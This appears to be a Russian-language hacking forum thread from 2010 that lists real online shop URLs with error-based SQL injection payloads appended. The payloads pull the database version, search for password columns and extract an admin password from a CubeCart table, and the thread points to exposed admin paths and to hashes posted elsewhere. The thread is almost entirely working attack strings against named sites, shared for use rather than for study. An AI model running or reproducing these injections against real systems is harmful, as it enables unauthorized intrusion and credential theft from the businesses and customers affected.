http://www.rdmarket.ru/index.php?productID=1492'+or+(1,1)=(select+count(0 ),concat((select+version()+from+information_schema .tables+limit+17,1),floor(rand(0)*2))from(informat ion_schema.tables)+group+by+2)--+
http://stroymag.kiev.ua/index.php?productID=342+or+(1,1)=(select+count(0), concat((select+version()+from+information_schema.c olumns+limit+0,1),floor(rand(0)*2))from(informatio n_schema.tables)+group+by+2)--+
http://www.vk4ajj.com/cubecart/index.php?_a=viewProd&productId=342+or+(1,1)=(select+count(0),concat((se lect+password+from+CubeCart_admin_users+limit+0,1) ,floor(rand(0)*2))from(information_schema.tables)+ group+by+2)--+
(http://www.vk4ajj.com/cubecart/modules/3rdparty/Estelles_Mod_Store/css/php.ini)
http://www.eventphotocards.com/index.php?_a=viewProd&productId=342+or+(1,1)=(select+count(0),concat((se lect+version()+from+information_schema.tables+limi t+0,1),floor(rand(0)*2))from(information_schema.ta bles)+group+by+2)--+
shell_c0de
18.08.2010, 03:31
Шоп
http://www.fitshop.de/de/kategorie/riegel/18/index.html?br[0]=4+and+row(1,2)in(select+count(*),concat((select+c oncat(table_name,0x3a,column_name)+from+informatio n_schema.columns+where+column_name+like+0x25706173 7325+limit+1,1),0x3a,floor(rand(0)*2))as+a+from+in formation_schema.columns+x+group+by+a)
Script: /de/kategorie/riegel/18/index.html?
http://fitshop.de/sqladmin/
хеши в соседном разделе.
продолжаем шопы
http://www.gskpiter.ru/index.php?productID=36+or+(1,1)=(select+count(0),c oncat((select+version()+from+information_schema.ta bles+limit+0,1),floor(rand(0)*2))from(information_ schema.tables)+group+by+2)--+
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot